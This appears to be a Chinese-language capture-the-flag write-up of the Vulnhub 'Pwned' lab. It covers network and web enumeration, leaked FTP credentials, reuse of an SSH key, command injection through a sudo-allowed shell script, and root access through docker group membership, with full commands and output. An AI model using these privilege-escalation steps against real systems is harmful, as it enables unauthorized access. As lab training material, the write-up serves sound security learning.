Vulnhub Pwned靶机解题详细过程
Pwned
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.184.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:df:e8:5f 1 60 PCS Systemtechnik GmbH
192.168.56.169 08:00:27:49:f9:fc 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.169
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 05:14 EST
Nmap scan report for bogon (192.168.56.169)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:49:F9:FC (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.60 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ftp 192.168.56.169
Connected to 192.168.56.169.
220 (vsFTPd 3.0.3)
Name (192.168.56.169:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.
目标主机的FTP服务不允许匿名访问
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ searchsploit vsftpd 3.0.3
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
FTP服务版本3.0.3没有可利用的漏洞。
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169
<!DOCTYPE html>
<html>
<head>
<title>Pwned....!!</title>
</head>
<body>
<h1> vanakam nanba (Hello friend) </h1>
<p></p>
<p>
<pre>
A last note from Attacker :)
I am Annlynn. I am the hacker hacked your server with your employees but they don't know how i used them.
Now they worry about this. Before finding me investigate your employees first. (LOL) then find me Boomers XD..!!
</pre>
</p>
</body>
</html>
<!-- I forgot to add this on last note
You are pretty smart as i thought
so here i left it for you
She sings very well. l loved it -->
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.169
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/11 05:19:06 Starting gobuster in directory enumeration mode
===============================================================
/nothing (Status: 301) [Size: 318] [--> http://192.168.56.169/nothing/]
/server-status (Status: 403) [Size: 279]
/hidden_text (Status: 301) [Size: 322] [--> http://192.168.56.169/hidden_text/]
Progress: 217242 / 220561 (98.50%)===============================================================
2022/11/11 05:19:30 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ nikto -h http://192.168.56.169
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.169
+ Target Hostname: 192.168.56.169
+ Target Port: 80
+ Start Time: 2022-11-11 05:20:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /nothing/: Directory indexing found.
+ Entry '/nothing/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2022-11-11 05:20:25 (GMT-5) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ dirb http://192.168.56.169
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Nov 11 05:20:34 2022
URL_BASE: http://192.168.56.169/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.169/ ----
+ http://192.168.56.169/index.html (CODE:200|SIZE:3065)
+ http://192.168.56.169/robots.txt (CODE:200|SIZE:41)
+ http://192.168.56.169/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Fri Nov 11 05:20:35 2022
DOWNLOADED: 4612 - FOUND: 3
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/robots.txt
# Group 1
User-agent: *
Allow: /nothing
发现了目录/nothing, /hidden_text
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/nothing
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.169/nothing/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.169 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/nothing/nothing.html
<!DOCTYPE html>
<html>
<head>
<title>Nothing</title>
</head>
<body>
<h1>i said nothing bro </h1>
<p></p>
<!--I said nothing here. you are wasting your time i don't lie-->
</body>
</html>
/nothing目录以及页面没有有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/hidden_text/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /hidden_text</title>
</head>
<body>
<h1>Index of /hidden_text</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="secret.dic">secret.dic</a></td><td align="right">2020-07-09 18:37 </td><td align="right">211 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.169 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/hidden_text/secret.dic
/hacked
/vanakam_nanba
/hackerman.gif
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home
用这个字典再扫描一下目录,发现/pwned.vuln是可用的
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/pwned.vuln/
<!DOCTYPE html>
<html>
<head>
<title>login</title>
</head>
<body>
<div id="main">
<h1> vanakam nanba. I hacked your login page too with advanced hacking method</h1>
<form method="POST">
Username <input type="text" name="username" class="text" autocomplete="off" required>
Password <input type="password" name="password" class="text" required>
<input type="submit" name="submit" id="sub">
</form>
</div>
</body>
</html>
<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>
这里有用户名ftpuser 以及密码f ($un=='f
用这个用户名和密码登录http://192.168.56.169/pwned.vuln/,发现不成功,联想到前面的FTP服务,由于用户名为ftpuser,因此有理由相信,这是FTP服务的用户名和密码:
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ftp 192.168.56.169
Connected to 192.168.56.169.
220 (vsFTPd 3.0.3)
Name (192.168.56.169:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||44859|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40139|)
150 Here comes the directory listing.
drwxrwxrwx 3 0 0 4096 Jul 09 2020 .
drwxr-xr-x 5 0 0 4096 Jul 10 2020 ..
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||54944|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 .
drwxrwxrwx 3 0 0 4096 Jul 09 2020 ..
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||12539|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |********************************************************************************************************************************************************************************| 2602 4.71 MiB/s 00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (3.24 MiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||56397|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |********************************************************************************************************************************************************************************| 75 159.22 KiB/s 00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (88.88 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ls
id_rsa nmap_full_scan note.txt secret.dic
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ cat note.txt
Wow you are here
ariana won't happy about this note
sorry ariana :(
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ls
id_rsa nmap_full_scan note.txt secret.dic
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ chmod 400 id_rsa
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ssh -i id_rsa ariana@192.168.56.169
The authenticity of host '192.168.56.169 (192.168.56.169)' can't be established.
ED25519 key fingerprint is SHA256:Eu7UdscPxuaxyzophLkeILniUaKCge0R96HjWhAmpyk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.169' (ED25519) to the list of known hosts.
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$
note.txt文件中作者提示我们用户名是ariana,而我们又从FTP服务器从下载私钥到Kali Linux本地,修改权限后即可访问其SSH.
发现可以不用密码执行/home/messeng.sh程序,而
ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh
ariana@pwned:~$ cat /home/messenger.sh
#!/bin/bash
clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
从该脚本可以看出,读取第二个参数时,读取msg,此时如果输入/bin/bash,即可得到selena的shell
ariana:
selena:
ftpuser:
Enter username to send message : ariana
Enter message for ariana :/bin/bash
Sending message to ariana
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
selena@pwned:/home/ariana$ cd /home
selena@pwned:/home$ ls
ariana ftpuser messenger.sh selena
selena@pwned:/home$ cd selena/
selena@pwned:~$ ls
selena-personal.diary user2.txt
selena@pwned:~$ ls -alh
total 24K
drwxrwx--- 3 selena root 4.0K Jul 10 2020 .
drwxr-xr-x 5 root root 4.0K Jul 10 2020 ..
-rw------- 1 selena selena 1 Jul 10 2020 .bash_history
drwxr-xr-x 3 selena selena 4.0K Jul 9 2020 .local
-rw-r--r-- 1 selena selena 132 Jul 10 2020 selena-personal.diary
-rw-r--r-- 1 selena selena 100 Jul 10 2020 user2.txt
selena@pwned:~$ cat user2.txt
711fdfc6caad532815a440f7f295c176
You are near to me. you found selena too.
Try harder to catch me
selena@pwned:~$ cat selena-personal.diary
Its Selena personal Diary :::
Today Ariana fight with me for Ajay. so i left her ssh key on FTP. now she resposible for the leak.
selena@pwned:~$ cat .bash_history
提权
发现selena是docker组,docker运行的所有命令都是需要sudo来运行,那是因为docker需要root权限才能跑。Docker监护进程有一个特性,它能被允许访问root用户或者是在docker组里面的所有用户。这就意味着,有docker 组的权限就如同**到root的访问权,而且不需要知道密码。。。
selena@pwned:/tmp$ id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
selena@pwned:/tmp$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
privesc latest 09ae39f0f8fc 2 years ago 88.3MB
<none> <none> e13ad046d435 2 years ago 88.3MB
alpine latest a24bb4013296 2 years ago 5.57MB
debian wheezy 10fcec6d95c4 3 years ago 88.3MB
selena@pwned:/tmp$ docker run -v /:/mnt -it alpine
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /root/
~ # ls -alh
total 12K
drwx------ 1 root root 4.0K Nov 11 11:25 .
drwxr-xr-x 1 root root 4.0K Nov 11 11:25 ..
-rw------- 1 root root 21 Nov 11 11:25 .ash_history
~ # cd /mnt
/mnt # ls -alh
total 277K
drwxr-xr-x 18 root root 4.0K Jul 6 2020 .
drwxr-xr-x 1 root root 4.0K Nov 11 11:25 ..
lrwxrwxrwx 1 root root 7 Jul 4 2020 bin -> usr/bin
drwxr-xr-x 4 root root 1.0K Jul 4 2020 boot
-rw------- 1 root root 352.0K Jul 6 2020 core
drwxr-xr-x 18 root root 3.2K Nov 11 10:11 dev
drwxr-xr-x 76 root root 4.0K Jul 10 2020 etc
drwxr-xr-x 5 root root 4.0K Jul 10 2020 home
lrwxrwxrwx 1 root root 30 Jul 4 2020 initrd.img -> boot/initrd.img-4.19.0-9-amd64
lrwxrwxrwx 1 root root 30 Jul 4 2020 initrd.img.old -> boot/initrd.img-4.19.0-9-amd64
lrwxrwxrwx 1 root root 7 Jul 4 2020 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jul 4 2020 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Jul 4 2020 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Jul 4 2020 libx32 -> usr/libx32
drwx------ 2 root root 16.0K Jul 4 2020 lost+found
drwxr-xr-x 3 root root 4.0K Jul 4 2020 media
drwxr-xr-x 2 root root 4.0K Jul 4 2020 mnt
drwxr-xr-x 3 root root 4.0K Jul 6 2020 opt
dr-xr-xr-x 94 root root 0 Nov 11 10:11 proc
drwx------ 3 root root 4.0K Jul 10 2020 root
drwxr-xr-x 21 root root 680 Nov 11 11:05 run
lrwxrwxrwx 1 root root 8 Jul 4 2020 sbin -> usr/sbin
drwxr-xr-x 3 root root 4.0K Jul 9 2020 srv
dr-xr-xr-x 13 root root 0 Nov 11 10:11 sys
drwxrwxrwt 9 root root 4.0K Nov 11 11:25 tmp
drwxr-xr-x 13 root root 4.0K Jul 4 2020 usr
drwxr-xr-x 12 root root 4.0K Jul 4 2020 var
lrwxrwxrwx 1 root root 27 Jul 4 2020 vmlinuz -> boot/vmlinuz-4.19.0-9-amd64
lrwxrwxrwx 1 root root 27 Jul 4 2020 vmlinuz.old -> boot/vmlinuz-4.19.0-9-amd64
/mnt # cd root
/mnt/root # ls -alh
total 28K
drwx------ 3 root root 4.0K Jul 10 2020 .
drwxr-xr-x 18 root root 4.0K Jul 6 2020 ..
-rw------- 1 root root 292 Jul 10 2020 .bash_history
-rw-r--r-- 1 root root 601 Jul 6 2020 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 4 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 429 Jul 10 2020 root.txt
/mnt/root # cat root.txt
4d4098d64e163d2726959455d046fd7c
You found me. i dont't expect this (◎ . ◎)
I am Ajay (Annlynn) i hacked your server left and this for you.
I trapped Ariana and Selena to takeover your server :)
You Pwned the Pwned congratulations :)
share the screen shot or flags to given contact details for confirmation
Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g
Instgarm ajs_walker
Twitter Ajs_walker
/mnt/root #
“-v”参数表示,咱要建一个磁盘卷给这个docker实例(将宿主机的/根目录映射到这个docker实例中的/mnt目录)。“-it”表示,运行命令后直接进入交互式shell界面,而不是让这个实例在后台运行。运行这个命令,咱cd到/mnt目录,然后宿主机/根目录下面的所有文件都可以看到了。
提权成功!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
